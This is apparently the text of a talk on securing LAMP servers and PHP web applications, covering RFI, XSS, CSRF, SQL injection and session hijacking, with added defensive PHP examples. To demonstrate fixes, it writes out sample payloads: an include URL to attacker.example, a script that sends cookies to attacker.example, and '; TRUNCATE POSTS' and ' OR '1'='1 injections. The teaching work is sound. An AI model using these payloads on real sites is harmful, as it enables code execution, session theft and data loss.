2. Who Am I?
Name: Richard Peter Ong a.k.a. Arpee
Work: Lead Developer, Internal Projects at SysIQ Inc.
Open Source Affiliations:
a.) core developer, MiaCMS
3. Who Are you?
✔ PHP Developers/Programmers
✔ L/U/W AMP SysAdmins
✔ IT Managers and Practitioners
✔ Geeks and hackers..
4. Scope and Coverage:
● Securing a basic U/L AMP server
● Web application attacks: description, samples and prevention
5. WHAT IS A WEB APPLICATION?
✔ Any application that is served over a network, commonly via the HTTP or HTTPS protocol
✔ Usually served from a remote computer acting as the host/server
6. WHAT IS SECURITY?
✔ A state of being free from damage and from being compromised
✔ A condition of being protected against danger or loss
10. Filesystem::
File Ownership and Permission
✔ Folders should be 0755 (owner may write; everyone may list and traverse)
✔ Files should be 0644 (owner may write; everyone may read)
✔ Files and folders under the Document Root should be owned by a dedicated unprivileged account, never by root. Owning them by the Apache user is the simple choice; tighter is a separate deploy user, with the Apache user given write access only where it is needed (uploads, cache), so that a compromised PHP script cannot rewrite the application's own code.
✔ 666 is evil in the web world, and so is 777: world-writable files and folders can be modified by any local user, or by any compromised process.
11. Filesystem::
How to Set Permissions
✔ Folders
chmod 0755 {directory}
✔ Files
chmod 0644 {files}
13. Firewall::
Opened Ports
✔ Port 80 Web/HTTP
✔ Port 443 Web/HTTPS
✔ Port 21 FTP (sends credentials in plaintext; prefer SFTP over port 22 and close 21 if you can)
✔ Port 22 SSH (restrict to administrator source addresses where possible)
✔ Port 25 SMTP (outgoing)
✔ Port 110 POP (inbound)
✔ Port 3306 MySQL daemon (open only if a remote host must reach the database; otherwise keep it closed, see the MySQL slides)
Everything not listed stays closed (default deny).
14. Secure httpd (Apache):
✔ Set an apache user: a dedicated unprivileged account in the User/Group directives
✔ Do not run apache as root: the parent process starts as root to bind ports 80/443, but the worker processes that handle requests must run as that unprivileged user
✔ 3rd Party Tools:
✔ ModSecurity (web application firewall module)
http://www.modsecurity.org/
15. Secure the mysqld (MySQL):
✔ Set the root (admin) password
✔ Rename the root (admin) account
✔ Restrict network access
✔ Use SSH tunneling/port forwarding if remote access is necessary
16. MySQL::
Set Admin Password
mysql -u root
mysql> SET PASSWORD FOR root@localhost=PASSWORD('password');
mysql> FLUSH PRIVILEGES;
Do this for every root row in mysql.user (root@127.0.0.1, root@::1 and root@<hostname> often exist as well). On MySQL 5.7.6 and later the PASSWORD() function is deprecated (removed in 8.0) and the password is set with an ALTER USER ... IDENTIFIED BY statement instead.
17. MySQL::
Change Admin Username
mysql -u root -p
mysql> UPDATE mysql.user SET User='mydbadmin' WHERE User='root';
mysql> FLUSH PRIVILEGES;
Qualify the table as mysql.user (or USE mysql first), otherwise the client reports that no database is selected. Give -p without the password so the client prompts for it; a password on the command line ends up in the shell history and in the process list. A RENAME USER statement is the supported way to rename an account rather than editing the grant tables directly.
18. MySQL::
Why Restrict Network Access?
✔ Usually only your web application needs access to the MySQL server, NOTHING ELSE, and it should connect as a dedicated low-privilege account, not as the admin account.
19. MySQL::
How to Restrict Network Access?
✔ Open my.cnf
✔ Add the skip-networking parameter in the [mysqld] section (when the server is launched through mysqld_safe, the option is passed on to mysqld)
✔ skip-networking turns TCP off entirely, leaving only the local Unix socket. If something on the same host must use TCP (the endpoint of an SSH tunnel, for example), use bind-address = 127.0.0.1 instead, which keeps the port closed to other hosts.
20. MySQL::
How to tunnel mysql via ssh?
ssh -N -f -L 3306:localhost:3306 user@mysql_server.com
-N Do not execute a remote command (useful for port forwarding only)
-f Go to the background after authentication
-L port:host:hostport Forward the local port to host:hostport as seen from the SSH server; here the server's own loopback, so MySQL must listen on 127.0.0.1 (bind-address), not run with skip-networking
Then connect to the local end with mysql -h 127.0.0.1 -P 3306 (with -h localhost the client uses the Unix socket and bypasses the tunnel). Pick another local port, e.g. 3307, if a MySQL server already listens on 3306 on the client machine.
22. PHP::
Functions to disable
✔ exec() - executes a command
✔ passthru() - executes a command and displays its raw output
✔ system(), shell_exec(), proc_open() and popen() are the same family; list them all in disable_functions in php.ini unless the application really needs them
23. PHP::
Register Globals
✔ DO NOT ENABLE register_globals (the directive was removed entirely in PHP 5.4)
✔ Write your apps to read request data explicitly from the superglobals ($_GET, $_POST, $_REQUEST and $_SERVER) and initialize every variable yourself before use; prefer $_GET or $_POST over $_REQUEST so you know where a value came from.
24. PHP::
allow_url_fopen, allow_url_include
✔ allow_url_fopen - if set to On, allows URLs to be treated as files by fopen(), file_get_contents() and friends
✔ allow_url_include - if set to On, allows include/require to open URLs (like http:// or ftp://) as files; it is Off by default since PHP 5.2 and should stay Off
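The three PHP slides above as one php.ini fragment, added here as an example and not taken from the talk. It assumes a PHP 5.x-era php.ini (register_globals no longer exists from PHP 5.4 on, where the line is simply ignored) and that the application itself never needs to run shell commands:

```ini
; Command-execution functions the application does not need. The slide lists
; the first two; system, shell_exec, proc_open and popen are the same family.
disable_functions = exec,passthru,system,shell_exec,proc_open,popen

; Never let request parameters become PHP variables.
register_globals = Off

; include/require must not fetch code over http:// or ftp://.
allow_url_include = Off

; URL wrappers for fopen()/file_get_contents(): turn off unless the app fetches
; remote resources, and keep allow_url_include off even then.
allow_url_fopen = Off
```

Confirm the running values with phpinfo() or php -i rather than trusting the file, since a second ini file, a .htaccess php_flag line or an ini_set() call can override them.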
27. Application Level Security::
Remote File Inclusion
Attack Description
A Remote File Inclusion is an attack where the attacker makes the target web application include, and therefore execute, a PHP script of the attacker's choosing, hosted on a server the attacker controls.
28. Application Level Security::
Remote File Inclusion
Attack Possible Damage
● The included script runs with the web server's privileges, so the attacker gets arbitrary code execution on the host
● Expose/modify variable values of the script doing the include()
● Expose stored credentials, e.g. MySQL user/pass from a webapp configuration file
29. Application Level Security::
Remote File Inclusion
Attack Vectors
● A user-controllable value in the variable passed to include() or require()
30. Application Level Security::
Remote File Inclusion
Attack Prevention
● Disable register_globals
● Disable allow_url_include (this is the setting include() and require() honour)
● Disable allow_url_fopen as well if nothing in the app fetches URLs; note that it also affects fopen() and file_get_contents()
● Do not include() from a dynamic variable with a user-controllable value; map the request parameter onto a fixed list of allowed files instead, which also blocks local-file inclusion and path traversal
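The include() pattern this slide warns about, beside a fixed version in which the request never supplies a path. This is an added example, not code from the talk or from MiaCMS; the pages directory, the page names and the attacker host are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not from the slides. 'pages/', the page names and the
// attacker host are hypothetical.

// VULNERABLE (shown for contrast, never executed here):
//   include $_GET['page'] . '.php';
// With allow_url_include=On, ?page=http://attacker.example/evil makes PHP fetch
// http://attacker.example/evil.php and run whatever text comes back; even with
// URL wrappers off, the same line lets the request choose which local file runs.

// FIXED: the request selects a key; the filename comes from a fixed map.
function resolve_page($requested, array $allowed, string $default = 'home'): string
{
    // $_GET values can be arrays (?page[]=x); only a string can be an accepted key.
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        $requested = $default;
    }
    return $allowed[$requested];
}

$allowed = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Constructed inputs: one legitimate, the rest hostile.
$inputs = ['about', 'http://attacker.example/evil', '../../../../etc/passwd', '', ['x']];
foreach ($inputs as $input) {
    printf("%-32s -> %s\n", is_string($input) ? $input : '(array)', resolve_page($input, $allowed));
}

// In the real page:  include resolve_page($_GET['page'] ?? 'home', $allowed);
```

Only 'about' resolves to its own file; the URL, the traversal string, the empty value and the array all fall back to the home page. Because the request can only pick a key, neither allow_url_include nor the filesystem layout matters to the outcome.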
31. Application Level Security::
Form Spoofing
Attack Description
An attack where an HTML form is mimicked or copied and then submitted from a location other than the original page, e.g. from a local copy of the form or from a script that posts directly to the accepting URL
32. Application Level Security::
Form Spoofing
Attack Possible Damage
● Bypass client-side (JavaScript) validation, which never runs for a spoofed submission
● Mass data insertion resulting in a flood (e.g. flooded guestbooks, forum boards etc.)
33. Application Level Security::
Form Spoofing
Attack Vectors
● No form tokens present, so every request thrown at the accepting script is considered valid
● Validation done only on the client side, with nothing repeated on the server
35. Application Level Security::
XSS
Attack Description
Cross-site scripting is an attack where the attacker injects HTML, usually client-side code such as JavaScript, into the HTML output of the web application. The injected HTML/JS then executes in the browser of every user visiting the infiltrated page.
36. Application Level Security::
XSS
Attack Possible Damage
● Steal the browser cookies (the session id) or fixate them, sending them to a page of the attacker's choosing
● Redirect the user to another page
● Mess up the format of a web application page (defacement)
38. Application Level Security::
XSS
Attack Prevention
● "Do Not Trust User Input" is not enough, I say: make user input trustable
● Filter incoming data down to what each field may legitimately contain
● Escape on output with htmlspecialchars() for the context the data is inserted into; this, not input filtering, is what stops stored data from becoming script
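Escaping on output and filtering on input, side by side, as an added example (not code from the talk or from MiaCMS). The comment markup, the numeric id field and the attacker host in the constructed payload are assumptions made for the example:

```php
<?php
declare(strict_types=1);

// Added example, not from the slides. The markup, the id field and the
// attacker host are hypothetical.

// Escape for HTML text and for double- or single-quoted attribute values.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Input filtering by whitelist: a post id is a positive integer, nothing else.
function post_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function render_comment(string $author, string $body): string
{
    // Vulnerable form, for contrast:  "<p class=\"by-$author\">$body</p>"
    return '<p class="by-' . e($author) . '">' . e($body) . '</p>';
}

// Constructed hostile input of the kind a guestbook or forum receives.
$author = '"><script>location="http://attacker.example/?c="+document.cookie</script>';
$body   = '<img src=x onerror="alert(document.cookie)">';

echo render_comment($author, $body), PHP_EOL;

var_dump(post_id('42'), post_id('42 OR 1=1'), post_id(['42']));
```

In the rendered comment every `<`, `>` and quote becomes an entity, so the browser shows the payload as text and the attribute the attacker tried to break out of stays closed. Of the three ids only '42' survives the filter; the string with trailing SQL and the array both come back as null. htmlspecialchars() covers HTML text and attribute values only: data placed inside a script block, a URL or a CSS value needs the encoding of that context instead.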
39. Application Level Security::
CSRF
Attack Description
Cross-Site Request Forgery is an attack where the attacker forces an unknowing victim's browser into making (malicious) HTTP requests to a web application, typically via an image tag, a link or an auto-submitting form on a page the attacker controls
40. Application Level Security::
CSRF
Attack Possible Damage
● Make the victim execute an operation on a web application without his knowledge while validly authenticated (e.g. change account details, logout, spam etc.)
41. Application Level Security::
CSRF
Attack Vectors
● XSS vulnerabilities (injected script can read a form token and submit the form itself, so token protection depends on XSS being fixed)
● Untokenized forms
● Usage of $_GET for operations where $_POST is better suited
42. Application Level Security::
CSRF
Attack Prevention
● Use $_POST instead of $_GET and/or $_REQUEST for state-changing operations (POST alone does not stop a forged request, since an attacker's page can auto-submit a form, but it keeps the action out of image tags and plain links)
● Filter incoming data
● Tokenize: one secret per session, embedded in every form and checked on submission
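One token implementation serves both the form-spoofing slides (slide 33, untokenized forms) and the CSRF prevention slide above. It is an added example, not code from the talk or from MiaCMS, and assumes PHP 7.0 or later for random_bytes(); the session is an ordinary array passed in, so the demo at the bottom runs from the command line without a web server:

```php
<?php
declare(strict_types=1);

// Added example, not from the slides. Assumes PHP 7+; the hidden-field name
// '_token' is an assumption.

// One secret per session, created on first use and reused by every form.
function form_token(array &$session): string
{
    if (empty($session['form_token'])) {
        $session['form_token'] = bin2hex(random_bytes(32));   // 256 bits from the CSPRNG
    }
    return $session['form_token'];
}

// Hidden input to drop into every state-changing form.
function form_token_field(array &$session): string
{
    $t = htmlspecialchars(form_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="_token" value="' . $t . '">';
}

// Accept the submission only if it is a POST carrying the session's own token.
function form_token_valid(array $session, array $post, string $method): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['form_token'] ?? '';
    $given    = $post['_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);   // constant-time comparison
}

// Demo with a constructed in-memory session in place of $_SESSION.
$session = [];
echo form_token_field($session), PHP_EOL;

$legit  = ['comment' => 'hello', '_token' => $session['form_token']];
$copied = ['comment' => 'spam'];                               // spoofed form, no token
$guess  = ['comment' => 'spam', '_token' => str_repeat('0', 64)];

var_dump(form_token_valid($session, $legit,  'POST'));
var_dump(form_token_valid($session, $copied, 'POST'));
var_dump(form_token_valid($session, $guess,  'POST'));
var_dump(form_token_valid($session, $legit,  'GET'));
```

Only the first submission is accepted: the copied form carries no token, the guessed one does not match, and the GET is refused regardless. In a real page call session_start() and pass $_SESSION, $_POST and $_SERVER['REQUEST_METHOD']. The token stops a request forged from another site and a form copied without its token; it does not stop a bot that first fetches the form and reads the token, so flooding still needs rate limiting or a CAPTCHA on top.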
43. Application Level Security::
SQL Injection
Attack Description
An SQL injection is an attack where the attacker is able to execute arbitrary SQL against the database by getting SQL of his own into a query the application builds from user input
44. Application Level Security::
SQL Injection: Basic Sample
// legit
$sort = 'ASC';
// malicious injection?
$sort = '; TRUNCATE POSTS';
// actual query, built by string interpolation
$query = "SELECT * FROM posts ORDER BY date_entered $sort";
// Resulting query: uh-oh!
// SELECT * FROM posts ORDER BY date_entered ; TRUNCATE POSTS
Whether the second statement actually runs depends on the database API: PHP's old mysql_query() sends a single statement, while mysqli_multi_query() and some PDO configurations allow stacked statements. Even where it does not run, the attacker still controls the tail of the query.
45. Application Level Security::
SQL Injection
Attack Possible Damage
● Destroy or corrupt data, e.g. by executing TRUNCATE TABLE or DELETE
● Alter current DB data (e.g. change the admin password)
● Read data the application never meant to show
46. Application Level Security::
SQL Injection
Attack Vectors
● Dynamic queries that interpolate unsanitized user-submitted data into the SQL string
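The fix for the basic sample, as an added example that is not code from the talk or from MiaCMS. It shows both halves a practitioner needs: a bound parameter for the value, and a whitelist for the ORDER BY column and direction, which cannot be bound because they are identifiers and keywords rather than values. It runs offline against an in-memory SQLite database with constructed rows; the table columns beyond date_entered are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not from the slides. Runs offline on SQLite; with MySQL only
// the DSN changes, and PDO::ATTR_EMULATE_PREPARES => false belongs in the
// options so the server itself prepares each statement.

// Identifiers and keywords cannot be bound as parameters, so user input is
// mapped onto fixed SQL fragments; anything unknown gets the default.
function order_clause(string $column, string $direction): string
{
    $columns = ['date_entered' => 'date_entered', 'title' => 'title'];
    $dirs    = ['asc' => 'ASC', 'desc' => 'DESC'];
    $col = $columns[$column] ?? 'date_entered';
    $dir = $dirs[strtolower($direction)] ?? 'ASC';
    return "ORDER BY $col $dir";
}

// $author is bound: quotes and semicolons inside it are data, never SQL.
function posts_by_author(PDO $db, string $author, string $column, string $direction): array
{
    $sql  = 'SELECT id, title FROM posts WHERE author = :author ' . order_clause($column, $direction);
    $stmt = $db->prepare($sql);
    $stmt->execute([':author' => $author]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in the table from the slide.
function demo_db(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, author TEXT, date_entered TEXT)');
    $ins = $db->prepare('INSERT INTO posts (title, author, date_entered) VALUES (?, ?, ?)');
    $rows = [['First', 'alice', '2008-01-01'], ['Second', 'alice', '2008-02-01'], ['Private', 'bob', '2008-03-01']];
    foreach ($rows as $row) {
        $ins->execute($row);
    }
    return $db;
}

$db = demo_db();
print_r(posts_by_author($db, 'alice', 'date_entered', 'desc'));
print_r(posts_by_author($db, "' OR '1'='1", 'date_entered', 'asc'));
print_r(posts_by_author($db, 'alice', 'title', '; TRUNCATE POSTS'));
echo order_clause('date_entered', '; TRUNCATE POSTS'), PHP_EOL;
```

The first call returns alice's two posts newest first; the classic `' OR '1'='1` returns no rows, because it is compared as a literal author name rather than parsed as SQL; and the injected sort from the slide collapses to plain ASC, so the TRUNCATE never reaches the database.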
48. Application Level Security::
Session Hijacking
Attack Description
Session hijacking is an attack where the attacker takes over the session of, and so impersonates, a legitimate user (commonly the administrator) who is currently logged in to the web application
49. Application Level Security::
Session Hijacking
Attack Possible Damage
● Attacker gaining administrator privileges; the damage/threat is highly serious.
50. Application Level Security::
Session Hijacking
Attack Vectors
● Session ID fixation via XSS (or via a session id the attacker places in a link, when the application accepts ids from the URL)
● Web application not going through HTTPS and therefore sniffable
● Session id not regenerated when necessary (at login and on any change of privilege)
51. Application Level Security::
Session Hijacking
Attack Prevention
● Protect the site against XSS attacks (fixation avoidance only; it does nothing against sniffing)
● Regenerate the SID whenever necessary, and do not trust a user-specified session id: accept only ids the server itself issued
● Deliver the web app over HTTPS to avoid getting sniffed, and mark the session cookie Secure so it is never sent in the clear
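The three prevention points as PHP session settings, added here as an example that is not code from the talk or from MiaCMS. It assumes PHP 7.3 or later (the array form of session_set_cookie_params with a samesite key) and a site served over HTTPS; the session keys user_id and login_at are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not from the slides. Assumes PHP 7.3+ and HTTPS.

function harden_session(): void
{
    // Reject session ids the server never issued: a planted (fixated) id is
    // simply replaced, which defeats fixation via XSS or a crafted link.
    ini_set('session.use_strict_mode', '1');
    // Take the id from the cookie only, never from ?PHPSESSID=... in the URL.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    session_set_cookie_params([
        'lifetime' => 0,        // session cookie, dropped when the browser closes
        'path'     => '/',
        'secure'   => true,     // sent over HTTPS only, so it cannot be sniffed in the clear
        'httponly' => true,     // hidden from document.cookie, limiting what XSS can steal
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Call once credentials have been verified: the privilege change is exactly
// the moment the slide means by "regenerate SID whenever necessary".
function login_user(int $userId): void
{
    session_regenerate_id(true);   // fresh id; the old session file is deleted
    $_SESSION['user_id']  = $userId;
    $_SESSION['login_at'] = time();
}

function logout_user(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 3600, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}

// Usage: harden_session() at the top of every request, before any output;
// login_user() after a successful credential check; logout_user() on logout.
harden_session();
```

With use_strict_mode on, an id the attacker planted in the victim's browser never becomes a valid session, and the regeneration at login means the id the attacker knew before authentication is worthless afterwards. The Secure and HttpOnly flags address the other two vectors on the previous slide: the cookie is never sent over plain HTTP, and injected script cannot read it.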
52. In a nutshell:
● The server level is part of the web application. It is necessary to secure the server as well: 30% of web application attacks are still suffered by the server.
● "Do not trust user input" is not enough; make user input TRUSTABLE by filtering it before it undergoes processing, and escape it on output.
● Tokenize your forms whenever necessary.
● Use SSL/TLS (HTTPS) when dealing with highly sensitive data, to avoid being sniffed or captured.